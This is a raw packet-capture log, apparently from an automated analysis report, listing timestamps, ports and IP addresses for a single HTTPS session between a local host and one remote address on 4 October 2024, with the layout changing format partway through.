Oct 4, 2024 11:25:21.517471075 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.517483950 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.517514944 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.517539978 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518150091 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518172026 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518227100 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518239021 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518274069 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518302917 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518678904 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518701077 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518744946 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518754959 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.518796921 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.518822908 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519361019 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519395113 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519431114 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519439936 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519476891 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519505024 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519789934 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519810915 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519853115 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519867897 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.519902945 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.519932032 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.520277023 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.520298004 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.520371914 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.520380974 CEST | 443 | 49707 | 185.199.108.133 | 192.168.2.8
Oct 4, 2024 11:25:21.520390034 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
Oct 4, 2024 11:25:21.520418882 CEST | 49707 | 443 | 192.168.2.8 | 185.199.108.133
                                                    Oct 4, 2024 11:25:21.521043062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521066904 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521107912 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.521117926 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521143913 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.521163940 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608011961 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608040094 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608170986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608191013 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608252048 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608504057 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608525038 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608611107 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608619928 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608681917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609132051 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609157085 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609194994 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609204054 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609231949 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609256983 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609522104 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609543085 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609579086 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609582901 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609627008 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611242056 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611268044 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611305952 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611310005 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611330986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611357927 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613334894 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613358974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613435984 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613441944 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613488913 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613512039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613543034 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613548040 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613573074 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613605976 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613635063 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613655090 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613684893 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613688946 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613713980 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613733053 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.699004889 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699038029 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699084997 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.699104071 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699129105 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.699148893 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.699537039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699559927 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699588060 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.699592113 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.699631929 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.700139999 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700162888 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700196028 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.700200081 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700392008 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.700622082 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700644970 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700681925 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.700685978 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.700720072 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.700741053 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.701246023 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.701268911 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.701313972 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.701318026 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.701364040 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.701981068 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702003002 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702068090 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.702074051 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702121019 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.702707052 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702732086 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702783108 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.702786922 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.702817917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.702847004 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.703340054 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.703362942 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.703406096 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.703409910 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.703463078 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.790220022 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790254116 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790379047 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.790404081 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790448904 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.790781975 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790805101 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790854931 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.790862083 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.790894985 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.790957928 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.791279078 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.791301012 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.791342020 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.791347027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.791397095 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.791491985 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.791941881 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.791964054 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.792026043 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.792032003 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.792073965 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.792467117 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.792493105 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.792527914 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.792531967 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.792574883 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793128967 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793153048 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793195009 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793199062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793241978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793344975 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793643951 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793665886 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793703079 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793706894 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.793746948 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.793821096 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.794394016 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.794418097 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.794450045 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.794455051 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.794507027 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.881334066 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881364107 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881517887 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.881548882 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881854057 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881880999 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881922007 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.881922007 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.881932020 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.881997108 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.881997108 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.882337093 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.882359982 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.882412910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.882419109 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.882442951 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.882508039 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.883115053 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.883141041 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.883183956 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.883189917 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.883253098 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.883312941 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.883644104 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.883666039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.883716106 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.883722067 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.884170055 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.884407043 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.884429932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.884480953 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.884488106 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.884612083 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885046959 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885070086 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885119915 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885126114 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885145903 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885191917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885426998 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885446072 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885509968 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885514975 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.885535955 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.885699034 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.972381115 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.972409964 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.972564936 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.972574949 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.972779989 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.972902060 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.972928047 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.972976923 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.972984076 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.973052025 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.973052025 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.973598957 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.973623037 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.973725080 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.973725080 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.973735094 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974087954 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974114895 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974158049 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.974164963 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974235058 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.974235058 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.974656105 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974678040 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.974757910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.974757910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.974765062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.975311995 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.975339890 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.975382090 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.975397110 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.975423098 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.975460052 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.975996017 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976022959 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976099014 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.976099014 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.976104975 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976540089 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976566076 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976607084 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.976613998 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.976635933 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.976675987 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.063256025 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.063285112 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.063396931 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.063426018 CEST44349707185.199.108.133192.168.2.8
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Oct 4, 2024 11:25:22.063823938 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.063853025 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.063893080 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.063893080 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.063906908 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.063970089 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.063970089 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.064378023 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.064421892 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.064605951 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.064616919 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.064673901 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.064845085 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.064868927 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.064944029 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.064944029 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.064953089 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.065419912 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.065445900 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.065494061 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.065494061 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.065505028 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066104889 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066127062 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066226959 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.066226959 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.066240072 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066761971 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066788912 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066833973 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.066833973 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.066845894 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.066915035 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.066915035 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.067421913 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.067444086 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.068614006 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.068625927 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.068698883 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.154258013 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.154287100 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.154433012 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.154454947 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.154522896 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.154768944 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.154795885 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.154915094 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.154925108 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155395985 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155417919 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.155427933 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155467987 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155471087 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.155531883 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.155538082 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155872107 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155893087 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155910969 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.155919075 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.155980110 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.155980110 CEST  49707        443        192.168.2.8      185.199.108.133
Oct 4, 2024 11:25:22.156764030 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.156788111 CEST  443          49707      185.199.108.133  192.168.2.8
Oct 4, 2024 11:25:22.157104015 CEST  443          49707      185.199.108.133  192.168.2.8
